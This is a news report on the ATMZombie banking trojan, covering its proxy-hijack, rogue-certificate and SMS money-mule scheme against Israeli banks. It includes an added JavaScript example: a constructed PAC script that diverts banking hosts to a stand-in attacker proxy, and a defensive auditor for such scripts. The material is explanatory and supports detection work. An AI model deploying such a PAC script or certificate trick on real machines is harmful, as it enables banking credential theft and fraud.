Trojan uses a combination of signed certificates, browser proxy auto-config files, and SMS messages to steal money

Mar 1, 2016 08:15 GMT  ·  By

ATMZombie is a new banking trojan discovered by security researchers from Kaspersky that has been seen targeting Israeli banks, the first of its kind to do so.

Detected in November 2015, ATMZombie uses the classic proxy-changing method to intercept the victim's Web traffic to banking portals. The theft itself then happens in a second, manual step in which the operators, together with a series of money mules, withdraw the money from ATMs.

ATMZombie trojan hijacks your browser's proxy settings

The proxy-changing method is an old trick among malware developers. Rather than tampering with the bank's site, the malware points the browser's proxy auto-configuration setting at a PAC (Proxy Auto-Config) script under the attackers' control.

A PAC script is a small piece of JavaScript that tells the browser, per URL, whether to connect directly or through a proxy. The malicious script sends the victim's traffic to the targeted banking sites through an intermediary node controlled by the attackers, who log every request, credentials included. Because that traffic is HTTPS, ATMZombie also installs its own signed certificate on infected PCs, so the browser accepts the certificates the intermediary presents for the banks' sites instead of warning the user.
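The selective routing described above, and a way to check for it, as an added example that is not code from the article or from Kaspersky's analysis of ATMZombie. The PAC text, host names, proxy address and URLs are all constructed for illustration; the auditor evaluates a PAC script's FindProxyForURL() against a list of URLs and reports which destinations would be diverted through a proxy.

```javascript
// Added example, not code from the article or from Kaspersky's write-up of
// ATMZombie. It shows (1) the shape of a selective PAC script of the kind the
// proxy-hijack technique relies on and (2) a small auditor that evaluates a
// PAC's FindProxyForURL() against a list of URLs so a defender can see which
// destinations would be diverted. Host names, the proxy address and the URLs
// are constructed for illustration.

const CONSTRUCTED_PAC = `
function FindProxyForURL(url, host) {
  // Only the targeted banking hosts are sent to the attacker's proxy;
  // all other traffic goes DIRECT so the victim notices nothing unusual.
  if (dnsDomainIs(host, ".example-bank.test") ||
      shExpMatch(host, "*.online-banking.test")) {
    return "PROXY 203.0.113.10:8080; DIRECT";
  }
  return "DIRECT";
}
`;

// Minimal versions of the helper functions a browser exposes to PAC scripts.
// Only the three used above are implemented; a fuller auditor would add the
// rest (isInNet, myIpAddress, ...).
const pacHelpers = {
  dnsDomainIs: (host, domain) =>
    host.length >= domain.length && host.endsWith(domain),
  isPlainHostName: (host) => !host.includes("."),
  shExpMatch: (str, pattern) => {
    // Translate a shell-style glob into an anchored regular expression.
    const re = "^" + pattern
      .replace(/[.+^${}()|[\]\\]/g, "\\$&")
      .replace(/\*/g, ".*")
      .replace(/\?/g, ".") + "$";
    return new RegExp(re).test(str);
  },
};

// Compile PAC source into a callable FindProxyForURL with the helpers in scope.
// The PAC is executed as code, so only run this on scripts you intend to audit.
function compilePac(pacSource) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(...names, `${pacSource}\nreturn FindProxyForURL;`);
  return factory(...names.map((n) => pacHelpers[n]));
}

// Evaluate every URL and flag the ones whose first route choice is a proxy.
function auditPac(pacSource, urls) {
  const findProxy = compilePac(pacSource);
  return urls.map((url) => {
    const host = new URL(url).hostname;
    const route = findProxy(url, host);
    return { url, host, route, proxied: /^\s*(PROXY|SOCKS\d?)\s/i.test(route) };
  });
}

// Convenience: just the hosts that would be diverted.
function divertedHosts(pacSource, urls) {
  return auditPac(pacSource, urls).filter((r) => r.proxied).map((r) => r.host);
}

// Constructed sample URLs: two targeted hosts and one unrelated site.
const SAMPLE_URLS = [
  "https://www.example-bank.test/login",
  "https://secure.online-banking.test/accounts",
  "https://news.example.test/",
];

for (const r of auditPac(CONSTRUCTED_PAC, SAMPLE_URLS)) {
  console.log(`${r.proxied ? "DIVERTED" : "direct  "}  ${r.host}  ->  ${r.route}`);
}
```

Two things to take from it. A PAC that diverts only a handful of hosts is invisible in ordinary browsing, which is why a blanket "is a proxy configured?" check is not enough; feed the script the hosts you actually care about. On Windows the auto-config URL the system proxy uses is stored in the AutoConfigURL value under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, so that value, together with any unexpected certificate in the trusted root store, is where an incident responder would look first.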

Once credentials are captured, the attack enters a "manual mode" stage that works only against Israeli banks, because it abuses a local service that lets an account holder send money to people who have no bank account or payment card.

Using the stolen credentials, the attacker logs into the victim's account and sends small payments to money mules through the bank's SMS transfer feature.

ATM money mules receive SMS messages from the victim's bank

The mule receives an SMS on their phone, they go to any bank ATM, enter the details and authorization code from the message, and the ATM will pull money from the victim's account, giving it to the money mule.

Kaspersky analysts say that multiple Israeli banks were hit this way and that the gang claimed hundreds of victims. The service limits the amount that can be withdrawn per transfer, so no single payment exceeded $750 (€690).

The natural conclusion is that the people behind this campaign are local criminals: they know the subtle intricacies of the Israeli banking scene, and they use and supervise local ATM money mules, something international gangs tend to avoid.

ATMZombie attack breakdown

ATMZombie targets customers of Israeli banks